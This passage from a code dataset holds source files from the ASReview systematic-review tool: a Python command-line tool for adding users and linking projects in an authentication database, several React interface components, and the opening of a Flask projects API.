argparse import RawTextHelpFormatter\nfrom uuid import UUID\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm import sessionmaker\n\nfrom asreview.entry_points.base import BaseEntryPoint\nfrom asreview.project import ASReviewProject\nfrom asreview.utils import asreview_path\nfrom asreview.webapp.authentication.models import Project\nfrom asreview.webapp.authentication.models import User\n\n\ndef auth_parser():\n parser = argparse.ArgumentParser(\n prog=\"auth_converter\",\n description=\"\"\"ASReview Authentication Conversion - convert your app to handle multiple users.\"\"\", # noqa\n formatter_class=RawTextHelpFormatter,\n epilog=\"Use -h or --help on all subcommands to view the available options.\",\n )\n\n sub_parser = parser.add_subparsers(help=\"The following options are available:\")\n\n user_par = sub_parser.add_parser(\"add-users\", help=\"Add users into the database.\")\n\n user_par.add_argument(\n \"-d\",\n \"--db-path\",\n type=str,\n help=\"Absolute path to authentication sqlite3 database.\",\n required=True,\n )\n\n user_par.add_argument(\n \"-j\",\n \"--json\",\n type=str,\n help=\"JSON string that contains a list with user account data.\",\n )\n\n list_users_par = sub_parser.add_parser(\n \"list-users\",\n help=\"List user accounts.\",\n )\n\n list_users_par.add_argument(\n \"-d\",\n \"--db-path\",\n type=str,\n help=\"Absolute path to authentication sqlite3 database.\",\n required=True,\n )\n\n list_projects_par = sub_parser.add_parser(\n \"list-projects\",\n help=\"List project info from all projects in the ASReview folder.\",\n )\n list_projects_par.add_argument(\n \"-j\",\n \"--json\",\n action=\"store_true\",\n help=\"Create JSON string to connect existing projects with users.\",\n )\n\n link_par = sub_parser.add_parser(\n \"link-projects\", help=\"Link projects to user accounts.\"\n )\n\n link_par.add_argument(\n \"-j\",\n \"--json\",\n type=str,\n help=\"Use a JSON string to link projects to users.\",\n )\n\n link_par.add_argument(\n \"-d\",\n \"--db-path\",\n type=str,\n help=\"Absolute path to authentication sqlite3 database.\",\n required=True,\n )\n\n return parser\n\n\ndef verify_id(id):\n try:\n UUID(id)\n return True\n except ValueError:\n return False\n\n\ndef insert_user(session, entry):\n \"\"\"Inserts a dictionary containing user data\n into the database.\"\"\"\n # create a user object\n user = User(\n entry[\"email\"].lower(),\n email=entry[\"email\"].lower(),\n name=entry[\"name\"],\n affiliation=entry[\"affiliation\"],\n password=entry[\"password\"],\n confirmed=True,\n )\n try:\n session.add(user)\n session.commit()\n print(f\"User with email {user.email} created.\")\n return True\n except IntegrityError:\n session.rollback()\n sys.stderr.write(f\"User with identifier {user.email} already exists\")\n return False\n\n\ndef insert_project(session, project):\n # get owner and project id\n owner_id = project[\"owner_id\"]\n project_id = project[\"project_id\"]\n\n # check if this project was already in the database under\n # the old project id\n db_project = (\n session.query(Project).filter(Project.project_id == project_id).one_or_none()\n )\n if db_project is None:\n # create new record\n session.add(Project(owner_id=owner_id, project_id=project_id))\n else:\n # update record (project_id must be the same)\n db_project.owner_id = owner_id\n # commit\n session.commit()\n print(\"Project data is stored.\")\n return True\n\n\ndef get_users(session):\n return session.query(User).all()\n\n\nclass AuthTool(BaseEntryPoint):\n def execute(self, argv):\n parser = auth_parser()\n args = parser.parse_args(argv)\n\n self.args = args\n self.argv = argv\n\n # create a conn object for the database\n if hasattr(self.args, \"db_path\") and self.args.db_path is not None:\n Session = sessionmaker()\n engine = create_engine(f\"sqlite:///{self.args.db_path}\")\n Session.configure(bind=engine)\n self.session = Session()\n\n if \"add-users\" in argv:\n self.add_users()\n elif \"list-users\" in argv:\n self.list_users()\n elif \"list-projects\" in argv:\n self.list_projects()\n elif \"link-projects\" in argv:\n self.link_projects()\n\n def add_users(self):\n if self.args.json is not None:\n entries = json.loads(self.args.json)\n # try to insert entries into the database\n for entry in entries:\n insert_user(self.session, entry)\n else:\n self.enter_users()\n\n def _ensure_valid_value_for(self, name, validation_function, hint=\"\"):\n \"\"\"Prompt user for validated input.\"\"\"\n while True:\n value = input(f\"{name}: \")\n if validation_function(value):\n return value\n else:\n sys.stderr.write(hint)\n\n def enter_users(self):\n while True:\n new_user = input(\"Enter a new user [Y/n]? \")\n if new_user == \"Y\":\n email = self._ensure_valid_value_for(\n \"Email address (required)\",\n User.valid_email,\n \"Entered email address is not recognized as a valid email address.\", # noqa\n )\n name = self._ensure_valid_value_for(\n \"Full name (required)\",\n lambda x: bool(x) and len(x) > 2,\n \"Full name must contain more than 2 characters.\",\n )\n affiliation = input(\"Affiliation: \")\n password = self._ensure_valid_value_for(\n \"Password (required)\",\n User.valid_password,\n \"Use 8 or more characters with a mix of letters, numbers & symbols.\", # noqa\n )\n\n insert_user(\n self.session,\n {\n \"email\": email,\n \"name\": name,\n \"affiliation\": affiliation,\n \"password\": password,\n },\n )\n else:\n break\n\n return True\n\n def _print_project(self, project):\n print(f\"\\n* {project['folder']}\")\n print(f\"\\tversion: {project['version']}\")\n print(f\"\\tid: {project['project_id']}\")\n print(f\"\\tname: {project['name']}\")\n print(f\"\\tauthors: {project['authors']}\")\n print(f\"\\tcreated: {project['created']}\")\n\n def _print_user(self, user):\n if bool(user.affiliation):\n postfix = f\", {user.affiliation}\"\n else:\n postfix = \"\"\n print(f\" {user.id} - {user.email} ({user.name}){postfix}\")\n\n def _get_projects(self):\n projects = [f for f in asreview_path().glob(\"*\") if f.is_dir()]\n result = []\n for folder in projects:\n project = ASReviewProject(folder)\n\n # Raise a RuntimeError if the project version is too low.\n if project.config.get(\"version\").startswith(\"0.\"):\n id = project.config.get(\"id\")\n message = f\"\"\"Version of project with id {id} is too old,\n please upgrade first before using this tool.\"\"\"\n raise RuntimeError(message)\n\n result.append(\n {\n \"folder\": folder.name,\n \"version\": project.config.get(\"version\"),\n \"project_id\": project.config.get(\"id\"),\n \"name\": project.config.get(\"name\"),\n \"authors\": project.config.get(\"authors\"),\n \"created\": project.config.get(\"datetimeCreated\"),\n \"owner_id\": 0,\n }\n )\n return result\n\n def list_users(self):\n users = get_users(self.session)\n print()\n for user in users:\n self._print_user(user)\n print()\n\n def list_projects(self):\n projects = self._get_projects()\n if self.args.json:\n # dump the data twice to create a string\n # that can be loaded again by the tool.\n print(json.dumps(json.dumps(projects)))\n else:\n [self._print_project(p) for p in projects]\n if len(projects) > 0:\n print()\n\n def _generate_project_links(self):\n result = []\n # get users and projects\n users = get_users(self.session)\n user_ids = [u.id for u in users]\n projects = self._get_projects()\n # print projects\n for project in projects:\n self._print_project(project)\n print(\"Who's the owner of this project?\")\n print(\"--------------------------------\")\n for user in users:\n self._print_user(user)\n id = None\n # and ask who the owner is\n while True:\n id = input(\"Enter the ID number of the owner: \")\n try:\n if isinstance(id, str):\n id = id.replace(\".\", \"\")\n id = int(id)\n if id not in user_ids:\n print(\"Entered ID does not exists, try again.\")\n else:\n insert_project(\n self.session,\n {\"project_id\": project[\"project_id\"], \"owner_id\": id},\n )\n break\n except ValueError:\n sys.stderr.write(\"Entered ID is not a number, please try again.\")\n return result\n\n def link_projects(self):\n # bulk JSON vs interactive\n if self.args.json is not None:\n projects = json.loads(self.args.json)\n # enter data in the database\n for project in projects:\n insert_project(self.session, project)\n else:\n self._generate_project_links()\n" }, { "alpha_fraction": 0.5318639874458313, "alphanum_fraction": 0.5336272120475769, "avg_line_length": 30.13725471496582, "blob_id": "902ef85e060cf7f8d3bde2f0acc6086c13997dfa", "content_id": "dba41c8c84a680a140e211c698ee8b661ad24926", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 7940, "license_type": "permissive", "max_line_length": 80, "num_lines": 255, "path": "/asreview/webapp/src/ProjectComponents/DetailsComponents/DetailsPage.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useMutation, useQueryClient } from \"react-query\";\nimport { useParams } from \"react-router-dom\";\nimport {\n Box,\n Button,\n Fade,\n IconButton,\n Menu,\n MenuItem,\n Stack,\n Tooltip,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport { MoreVert } from \"@mui/icons-material\";\nimport LoadingButton from \"@mui/lab/LoadingButton\";\n\nimport { ProjectInfoForm, ProjectDeleteDialog } from \"../../ProjectComponents\";\nimport { ActionsFeedbackBar } from \"../../Components\";\nimport { DataForm, ModelForm } from \"../DetailsComponents\";\nimport { TypographyH5Medium } from \"../../StyledComponents/StyledTypography.js\";\nimport { ProjectAPI } from \"../../api/index.js\";\nimport { projectModes, projectStatuses } from \"../../globals.js\";\nimport { useToggle } from \"../../hooks/useToggle\";\n\nconst Root = styled(\"div\")(({ theme }) => ({}));\n\nconst DetailsPage = (props) => {\n const { project_id } = useParams();\n const queryClient = useQueryClient();\n\n const [anchorEl, setAnchorEl] = React.useState(null);\n const onOptions = Boolean(anchorEl);\n\n const [onDeleteDialog, toggleDeleteDialog] = useToggle();\n const [disableSaveButton, setDisableSaveButton] = React.useState(true);\n const [disableUndoButton, setDisableUndoButton] = React.useState(true);\n const [info, setInfo] = React.useState({\n mode: props.info?.mode,\n title: props.info?.name,\n authors: props.info?.authors,\n description: props.info?.description,\n });\n\n const {\n error: mutateInfoError,\n isError: isMutateInfoError,\n isLoading: isMutatingInfo,\n isSuccess: isMutateInfoSuccess,\n mutate: mutateInfo,\n reset: resetMutateInfo,\n } = useMutation(ProjectAPI.mutateInfo, {\n onSuccess: (data, variables) => {\n setDisableSaveButton(true);\n setDisableUndoButton(true);\n // update cached data\n queryClient.setQueryData(\n [\"fetchInfo\", { project_id: variables.project_id }],\n (prev) => {\n return {\n ...prev,\n name: variables.title,\n authors: variables.authors,\n description: variables.description,\n };\n },\n );\n },\n });\n\n const {\n error: mutateStatusError,\n isError: isMutateStatusError,\n mutate: mutateStatus,\n reset: resetMutateStatus,\n } = useMutation(ProjectAPI.mutateProjectStatus, {\n onSuccess: () => {\n queryClient.invalidateQueries(\"fetchInfo\");\n },\n });\n\n const handleClickUndoChanges = () => {\n setInfo({\n ...info,\n title: props.info?.name,\n authors: props.info?.authors,\n description: props.info?.description,\n });\n setDisableSaveButton(true);\n setDisableUndoButton(true);\n };\n\n const handleClickSave = () => {\n mutateInfo({\n project_id,\n mode: info.mode,\n title: info.title,\n authors: info.authors,\n description: info.description,\n });\n };\n\n const handleClickOptions = (event) => {\n setAnchorEl(event.currentTarget);\n };\n\n const handleCloseOptions = () => {\n setAnchorEl(null);\n };\n\n const handleChangeStatus = () => {\n handleCloseOptions();\n mutateStatus({\n project_id,\n status:\n props.info?.reviews[0].status === projectStatuses.REVIEW\n ? projectStatuses.FINISHED\n : projectStatuses.REVIEW,\n });\n };\n\n const handleClickDelete = () => {\n handleCloseOptions();\n toggleDeleteDialog();\n };\n\n return (\n <Root aria-label=\"details page\">\n <Fade in>\n <Box>\n {/* Page title */}\n <Box\n className=\"main-page-sticky-header-wrapper\"\n sx={{ background: (theme) => theme.palette.background.paper }}\n >\n <Box className=\"main-page-sticky-header with-button\">\n {!props.mobileScreen && (\n <TypographyH5Medium>Details</TypographyH5Medium>\n )}\n {props.mobileScreen && (\n <Typography variant=\"h6\">Details</Typography>\n )}\n <Stack direction=\"row\" spacing={1}>\n <Button\n disabled={disableUndoButton}\n onClick={handleClickUndoChanges}\n size={!props.mobileScreen ? \"medium\" : \"small\"}\n >\n Undo Changes\n </Button>\n <Tooltip\n disableFocusListener={!props.isSimulating}\n disableHoverListener={!props.isSimulating}\n disableTouchListener={!props.isSimulating}\n title=\"Save after simulation is finished\"\n >\n <span>\n <LoadingButton\n disabled={disableSaveButton || props.isSimulating}\n loading={isMutatingInfo}\n variant=\"contained\"\n onClick={handleClickSave}\n size={!props.mobileScreen ? \"medium\" : \"small\"}\n >\n Save\n </LoadingButton>\n </span>\n </Tooltip>\n <Box>\n <Tooltip title=\"Options\">\n <IconButton\n onClick={handleClickOptions}\n size={!props.mobileScreen ? \"medium\" : \"small\"}\n >\n <MoreVert\n fontSize={!props.mobileScreen ? \"medium\" : \"small\"}\n />\n </IconButton>\n </Tooltip>\n <Menu\n anchorEl={anchorEl}\n open={onOptions}\n onClose={handleCloseOptions}\n >\n {info.mode !== projectModes.SIMULATION && (\n <MenuItem onClick={handleChangeStatus}>\n {props.info?.reviews[0].status ===\n projectStatuses.REVIEW\n ? \"Mark as finished\"\n : \"Mark as in review\"}\n </MenuItem>\n )}\n <MenuItem onClick={handleClickDelete}>Delete</MenuItem>\n </Menu>\n </Box>\n </Stack>\n </Box>\n </Box>\n\n {/* Page body */}\n <Box className=\"main-page-body-wrapper\">\n <Stack\n className=\"main-page-body\"\n direction={!props.mobileScreen ? \"row\" : \"column\"}\n spacing={3}\n >\n <ProjectInfoForm\n info={info}\n mobileScreen={props.mobileScreen}\n setInfo={setInfo}\n setDisableSaveButton={setDisableSaveButton}\n setDisableUndoButton={setDisableUndoButton}\n />\n <Stack\n spacing={3}\n sx={{ width: !props.mobileScreen ? \"40%\" : \"100%\" }}\n >\n <DataForm setHistoryFilterQuery={props.setHistoryFilterQuery} />\n <ModelForm />\n </Stack>\n </Stack>\n </Box>\n </Box>\n </Fade>\n <ProjectDeleteDialog\n onDeleteDialog={onDeleteDialog}\n toggleDeleteDialog={toggleDeleteDialog}\n projectTitle={props.info?.name}\n project_id={project_id}\n />\n <ActionsFeedbackBar\n feedback=\"Changes saved\"\n open={isMutateInfoSuccess}\n onClose={resetMutateInfo}\n />\n {isMutateInfoError && (\n <ActionsFeedbackBar\n feedback={mutateInfoError?.message + \" Please try again.\"}\n open={isMutateInfoError}\n onClose={resetMutateInfo}\n />\n )}\n {isMutateStatusError && (\n <ActionsFeedbackBar\n feedback={mutateStatusError?.message + \" Please try again.\"}\n open={isMutateStatusError}\n onClose={resetMutateStatus}\n />\n )}\n </Root>\n );\n};\n\nexport default DetailsPage;\n" }, { "alpha_fraction": 0.4992004632949829, "alphanum_fraction": 0.5068196654319763, "avg_line_length": 28.448753356933594, "blob_id": "8a95a29017901fb90bd9b20937b6d064b23e82a1", "content_id": "cd297436a3da7e11371fece19c0770b9221f7439", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 10631, "license_type": "permissive", "max_line_length": 125, "num_lines": 361, "path": "/asreview/webapp/src/ProjectComponents/AnalyticsComponents/ProgressDensityChart.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport Chart from \"react-apexcharts\";\nimport {\n Box,\n Card,\n CardContent,\n Stack,\n Tooltip,\n tooltipClasses,\n Typography,\n} from \"@mui/material\";\nimport { styled, useTheme } from \"@mui/material/styles\";\nimport { HelpOutline } from \"@mui/icons-material\";\n\nimport { CardErrorHandler } from \"../../Components\";\nimport { TypographySubtitle1Medium } from \"../../StyledComponents/StyledTypography.js\";\n\nimport tooltipRelevantLight from \"../../images/progress_relevant_light.png\";\nimport tooltipRelevantDark from \"../../images/progress_relevant_dark.png\";\nimport tooltipIrrelevantLight from \"../../images/progress_irrelevant_light.png\";\nimport tooltipIrrelevantDark from \"../../images/progress_irrelevant_dark.png\";\n\nimport \"./AnalyticsPage.css\";\n\nconst PREFIX = \"ProgressDensityChart\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n title: `${PREFIX}-title`,\n tooltipCardColor: `${PREFIX}-tooltip-card-color`,\n tooltipLabelContainer: `${PREFIX}-tooltip-label-container`,\n tooltipLabelMarkerRelevantColor: `${PREFIX}-tooltip-label-marker-relevant-color`,\n tooltipLabelRelevantNumber: `${PREFIX}-tooltip-label-relevant-number`,\n tooltipLabelTextSecondaryColor: `${PREFIX}-tooltip-label-text-secondary-color`,\n};\n\nconst StyledCard = styled(Card)(({ theme }) => ({\n borderRadius: 16,\n maxWidth: 960,\n overflow: \"visible\",\n position: \"relative\",\n width: \"100%\",\n [`& .${classes.root}`]: {\n paddingTop: 24,\n paddingLeft: 32,\n paddingRight: 32,\n },\n\n [`& .${classes.title}`]: {\n display: \"flex\",\n alignItems: \"baseline\",\n },\n\n [`& .${classes.tooltipCardColor}`]: {\n color: theme.palette.text.primary,\n background: theme.palette.background.paper,\n },\n\n [`& .${classes.tooltipLabelContainer}`]: {\n display: \"flex\",\n alignItems: \"baseline\",\n justifyContent: \"space-between\",\n },\n\n [`& .${classes.tooltipLabelMarkerRelevantColor}`]: {\n ...(theme.palette.mode === \"light\" && {\n color: theme.palette.primary.light,\n background: theme.palette.primary.light,\n }),\n ...(theme.palette.mode === \"dark\" && {\n color: theme.palette.primary.main,\n background: theme.palette.primary.main,\n }),\n },\n\n [`& .${classes.tooltipLabelRelevantNumber}`]: {\n marginLeft: 20,\n ...(theme.palette.mode === \"dark\" && {\n color: theme.palette.primary.main,\n }),\n },\n\n [`& .${classes.tooltipLabelTextSecondaryColor}`]: {\n color: theme.palette.text.secondary,\n },\n}));\n\nconst StyledTooltip = styled(({ className, ...props }) => (\n <Tooltip {...props} classes={{ popper: className }} />\n))(({ theme }) => ({\n [`& .${tooltipClasses.tooltip}`]: {\n backgroundColor: theme.palette.background.paper,\n color: theme.palette.text.primary,\n padding: 0,\n maxWidth: 410,\n fontSize: theme.typography.pxToRem(12),\n },\n}));\n\nconst customTooltip = ({ series, seriesIndex, dataPointIndex, w }) => {\n let total = dataPointIndex + 1;\n return (\n `<div class=\"tooltip-card ProgressDensityChart-tooltip-card-color\">` +\n '<div class=\"tooltip-card-content\">' +\n '<h6 class=\"tooltip-title\">' +\n total +\n ` reviewed records` +\n \"</h6>\" +\n `<div class=\"ProgressDensityChart-tooltip-label-container\">` +\n \"<div>\" +\n \"<div>\" +\n `<span class=\"apexcharts-legend-marker tooltip-label-marker ProgressDensityChart-tooltip-label-marker-relevant-color\">` +\n \"</span>\" +\n `<span class=\"apexcharts-legend-text tooltip-label-text\">` +\n \"Relevant in last 10 reviewed\" +\n \"</span>\" +\n \"</div>\" +\n `<p class=\"tooltip-label-text-secondary ProgressDensityChart-tooltip-label-text-secondary-color\">` +\n \"Relevant records that you labeled in the last 10 reviewed\" +\n \"</p>\" +\n \"</div>\" +\n `<h6 class=\"tooltip-label-number ProgressDensityChart-tooltip-label-relevant-number\">` +\n series[0][dataPointIndex] +\n \"</h6>\" +\n \"</div>\" +\n \"</div>\" +\n \"</div>\"\n );\n};\n\nexport default function ProgressDensityChart(props) {\n const theme = useTheme();\n\n const returnTooltipRelevantImg = () => {\n if (theme.palette.mode === \"light\") {\n return tooltipRelevantLight;\n }\n if (theme.palette.mode === \"dark\") {\n return tooltipRelevantDark;\n }\n };\n\n const returnTooltipIrrelevantImg = () => {\n if (theme.palette.mode === \"light\") {\n return tooltipIrrelevantLight;\n }\n if (theme.palette.mode === \"dark\") {\n return tooltipIrrelevantDark;\n }\n };\n\n /**\n * Chart data array\n */\n const seriesArray = React.useCallback(() => {\n if (props.progressDensityQuery.data) {\n return [\n {\n name: \"Relevant records\",\n data: props.progressDensityQuery.data?.relevant,\n },\n ];\n } else {\n return [];\n }\n }, [props.progressDensityQuery.data]);\n\n /**\n * Chart options\n */\n const optionsChart = React.useCallback(() => {\n return {\n chart: {\n animations: {\n enabled: false,\n },\n background: \"transparent\",\n id: \"ASReviewLABprogressDensity\",\n type: \"area\",\n stacked: true,\n toolbar: {\n show: !props.mobileScreen,\n },\n },\n colors: [\n theme.palette.mode === \"light\"\n ? theme.palette.primary.light\n : theme.palette.primary.main,\n \"#CED4DC\",\n ],\n dataLabels: {\n enabled: false,\n },\n fill: {\n type: \"gradient\",\n gradient: {\n shadeIntensity: theme.palette.mode === \"light\" ? 0.9 : 0.2,\n opacityFrom: 0.5,\n opacityTo: 0.9,\n },\n },\n legend: {\n position: \"top\",\n horizontalAlign: \"left\",\n fontSize: !props.mobileScreen ? \"14px\" : \"12px\",\n fontFamily: theme.typography.subtitle2.fontFamily,\n fontWeight: theme.typography.subtitle2.fontWeight,\n labels: {\n colors: theme.palette.text.secondary,\n },\n markers: {\n width: 8,\n height: 8,\n offsetX: -4,\n },\n itemMargin: {\n horizontal: 16,\n },\n },\n markers: {\n size: 0,\n },\n noData: {\n text: \"No data available\",\n },\n stroke: {\n curve: \"smooth\",\n lineCap: \"round\",\n width: 2,\n },\n theme: {\n mode: theme.palette.mode,\n },\n tooltip: {\n custom: customTooltip,\n },\n xaxis: {\n decimalsInFloat: 0,\n title: {\n text: \"Number of reviewed records\",\n },\n type: \"numeric\",\n labels: {\n show: true,\n },\n axisTicks: {\n show: false,\n },\n tooltip: {\n enabled: false,\n },\n },\n yaxis: {\n showAlways: false,\n max: 10,\n min: 0,\n tickAmount: 3,\n title: {\n text: \"Number of relevant records\",\n },\n },\n };\n }, [theme, props.mobileScreen]);\n\n const [series, setSeries] = React.useState(seriesArray());\n const [options, setOptions] = React.useState(optionsChart());\n\n React.useEffect(() => {\n setSeries(seriesArray());\n setOptions(optionsChart());\n }, [seriesArray, optionsChart]);\n\n return (\n <StyledCard elevation={2}>\n <CardErrorHandler\n queryKey={\"fetchProgressDensity\"}\n error={props.progressDensityQuery.error}\n isError={props.progressDensityQuery.isError}\n />\n <CardContent className={classes.root}>\n <Stack spacing={2}>\n <Box className={classes.title}>\n {!props.mobileScreen && (\n <Typography variant=\"h6\">Progress</Typography>\n )}\n {props.mobileScreen && (\n <TypographySubtitle1Medium>Progress</TypographySubtitle1Medium>\n )}\n <StyledTooltip\n title={\n <React.Fragment>\n <Card sx={{ backgroundImage: \"none\" }}>\n <CardContent>\n <Stack spacing={2}>\n <Box sx={{ display: \"flex\" }}>\n <Stack direction=\"row\" spacing={2}>\n <img\n src={returnTooltipRelevantImg()}\n alt=\"tooltip relevant\"\n className=\"tooltip-img\"\n />\n <Box>\n <Typography variant=\"subtitle2\">\n Presence of relevant records\n </Typography>\n <Typography\n variant=\"body2\"\n sx={{ color: \"text.secondary\" }}\n >\n Relevant records still appear. Continue\n reviewing to discover more.\n </Typography>\n </Box>\n </Stack>\n </Box>\n <Box sx={{ display: \"flex\" }}>\n <Stack direction=\"row\" spacing={2}>\n <img\n src={returnTooltipIrrelevantImg()}\n alt=\"tooltip irrelevant\"\n className=\"tooltip-img\"\n />\n <Box>\n <Typography variant=\"subtitle2\">\n Irrelevant records only\n </Typography>\n <Typography\n variant=\"body2\"\n sx={{ color: \"text.secondary\" }}\n >\n Relevant records do not appear. Refer to your\n stopping rule to decide if you want to continue\n reviewing.\n </Typography>\n </Box>\n </Stack>\n </Box>\n </Stack>\n </CardContent>\n </Card>\n </React.Fragment>\n }\n >\n <HelpOutline\n fontSize={!props.mobileScreen ? \"small\" : \"12px\"}\n sx={{ color: \"text.secondary\", marginLeft: \"8px\" }}\n />\n </StyledTooltip>\n </Box>\n <Chart\n options={options}\n series={series}\n type=\"area\"\n height={230}\n width=\"100%\"\n />\n </Stack>\n </CardContent>\n </StyledCard>\n );\n}\n" }, { "alpha_fraction": 0.6842619776725769, "alphanum_fraction": 0.6842619776725769, "avg_line_length": 30.96875, "blob_id": "7dfda61c66d93966656e91a1f73c0b3ea5fbc78b", "content_id": "717c86c62226cd90000418c0e29367a59907c12b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1023, "license_type": "permissive", "max_line_length": 70, "num_lines": 32, "path": "/asreview/webapp/src/ProjectComponents/TeamComponents/ConfirmationDialog.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import { Button } from \"@mui/material\";\nimport Dialog from \"@mui/material/Dialog\";\nimport DialogActions from \"@mui/material/DialogActions\";\nimport DialogContent from \"@mui/material/DialogContent\";\nimport DialogContentText from \"@mui/material/DialogContentText\";\nimport DialogTitle from \"@mui/material/DialogTitle\";\n\nconst ConfirmationDialog = (props) => {\n return (\n <Dialog\n open={props.open}\n onClose={props.handleCancel}\n aria-labelledby=\"alert-dialog-title\"\n aria-describedby=\"alert-dialog-description\"\n >\n <DialogTitle id=\"alert-dialog-title\">{props.title}</DialogTitle>\n <DialogContent>\n <DialogContentText id=\"alert-dialog-description\">\n {props.contents}\n </DialogContentText>\n </DialogContent>\n <DialogActions>\n <Button onClick={props.handleCancel}>Cancel</Button>\n <Button onClick={props.handleConfirm} autoFocus>\n Remove\n </Button>\n </DialogActions>\n </Dialog>\n );\n};\n\nexport default ConfirmationDialog;\n" }, { "alpha_fraction": 0.586410403251648, "alphanum_fraction": 0.5920366644859314, "avg_line_length": 31.071292877197266, "blob_id": "59d575783dd5adadbd11208031f97ef021504f97", "content_id": "e8ecea811d04a2d89395818dca071a1c7b84b461", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 50833, "license_type": "permissive", "max_line_length": 87, "num_lines": 1585, "path": "/asreview/webapp/api/projects.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport logging\nimport shutil\nimport subprocess\nimport tempfile\nfrom pathlib import Path\nfrom urllib.request import urlretrieve\nfrom uuid import uuid4\n\nimport datahugger\nimport numpy as np\nimport pandas as pd\nfrom flask import Blueprint\nfrom flask import abort\nfrom flask import current_app\nfrom flask import jsonify\nfrom flask import request\nfrom flask import send_file\nfrom flask_login import current_user\nfrom sqlalchemy import and_\nfrom werkzeug.exceptions import InternalServerError\nfrom werkzeug.utils import secure_filename\n\nfrom asreview.config import DEFAULT_BALANCE_STRATEGY\nfrom asreview.config import DEFAULT_FEATURE_EXTRACTION\nfrom asreview.config import DEFAULT_MODEL\nfrom asreview.config import DEFAULT_QUERY_STRATEGY\nfrom asreview.config import PROJECT_MODE_EXPLORE\nfrom asreview.config import PROJECT_MODE_SIMULATE\nfrom asreview.data import ASReviewData\nfrom asreview.data.statistics import n_duplicates\nfrom asreview.datasets import DatasetManager\nfrom asreview.exceptions import BadFileFormatError\nfrom asreview.io import list_readers\nfrom asreview.io import list_writers\nfrom asreview.models.balance import get_balance_model\nfrom asreview.models.balance import list_balance_strategies\nfrom asreview.models.classifiers import get_classifier\nfrom asreview.models.classifiers import list_classifiers\nfrom asreview.models.feature_extraction import get_feature_model\nfrom asreview.models.feature_extraction import list_feature_extraction\nfrom asreview.models.query import get_query_model\nfrom asreview.models.query import list_query_strategies\nfrom asreview.project import ASReviewProject\nfrom asreview.project import ProjectNotFoundError\nfrom asreview.project import get_project_path\nfrom asreview.project import get_projects\nfrom asreview.project import is_v0_project\nfrom asreview.project import open_state\nfrom asreview.project import project_from_id\nfrom asreview.search import SearchError\nfrom asreview.search import fuzzy_find\nfrom asreview.settings import ASReviewSettings\nfrom asreview.state.errors import StateError\nfrom asreview.state.errors import StateNotFoundError\nfrom asreview.state.sql_converter import upgrade_asreview_project_file\nfrom asreview.state.sql_converter import upgrade_project_config\nfrom asreview.utils import _get_executable\nfrom asreview.utils import _get_filename_from_url\nfrom asreview.utils import asreview_path\nfrom asreview.utils import list_reader_names\nfrom asreview.webapp import DB\nfrom asreview.webapp.authentication.login_required import app_is_authenticated\nfrom asreview.webapp.authentication.login_required import asreview_login_required\nfrom asreview.webapp.authentication.login_required import project_authorization\nfrom asreview.webapp.authentication.models import Project\nfrom asreview.webapp.io import read_data\n\nbp = Blueprint(\"api\", __name__, url_prefix=\"/api\")\n\n\n# error handlers\[email protected](ValueError)\ndef value_error(e):\n message = str(e) if str(e) else \"Incorrect value.\"\n logging.error(message)\n return jsonify(message=message), 400\n\n\[email protected](ProjectNotFoundError)\ndef project_not_found(e):\n message = str(e) if str(e) else \"Project not found.\"\n logging.error(message)\n return jsonify(message=message), 404\n\n\[email protected](InternalServerError)\ndef error_500(e):\n original = getattr(e, \"original_exception\", None)\n\n if original is None or str(e.original_exception) == \"\":\n # direct 500 error, such as abort(500)\n logging.error(e)\n return jsonify(message=\"Whoops, something went wrong.\"), 500\n\n # wrapped unhandled error\n logging.error(e.original_exception)\n return jsonify(message=str(e.original_exception)), 500\n\n\n# routes\[email protected](\"/projects\", methods=[\"GET\"])\n@asreview_login_required\ndef api_get_projects(): # noqa: F401\n \"\"\"\"\"\"\n project_info = []\n\n if app_is_authenticated(current_app):\n # authenticated with User accounts\n user_db_projects = list(current_user.projects) + list(current_user.involved_in)\n project_paths = [project.project_path for project in user_db_projects]\n owner_ids = [project.owner_id for project in user_db_projects]\n projects = get_projects(project_paths)\n else:\n # force get_projects to list the .asreview folder\n projects = get_projects(None)\n owner_ids = [None for p in projects]\n\n for project, owner_id in zip(projects, owner_ids):\n try:\n project_config = project.config\n\n # upgrade info of v0 projects\n if project_config[\"version\"].startswith(\"0\"):\n project_config = upgrade_project_config(project_config)\n project_config[\"projectNeedsUpgrade\"] = True\n\n # add ownership information if authentication is enabled\n if app_is_authenticated(current_app):\n project_config[\"owner_id\"] = owner_id\n\n logging.info(\"Project found: {}\".format(project_config[\"id\"]))\n project_info.append(project_config)\n\n except Exception as err:\n logging.error(err)\n\n # sort the projects based on created_at_unix\n project_info = sorted(\n project_info,\n key=lambda y: (y[\"created_at_unix\"] is not None, y[\"created_at_unix\"]),\n reverse=True,\n )\n\n response = jsonify({\"result\": project_info})\n\n return response\n\n\[email protected](\"/projects/stats\", methods=[\"GET\"])\n@asreview_login_required\ndef api_get_projects_stats(): # noqa: F401\n \"\"\"Get dashboard statistics of all projects\"\"\"\n\n stats_counter = {\"n_in_review\": 0, \"n_finished\": 0, \"n_setup\": 0}\n\n if app_is_authenticated(current_app):\n user_db_projects = list(current_user.projects) + 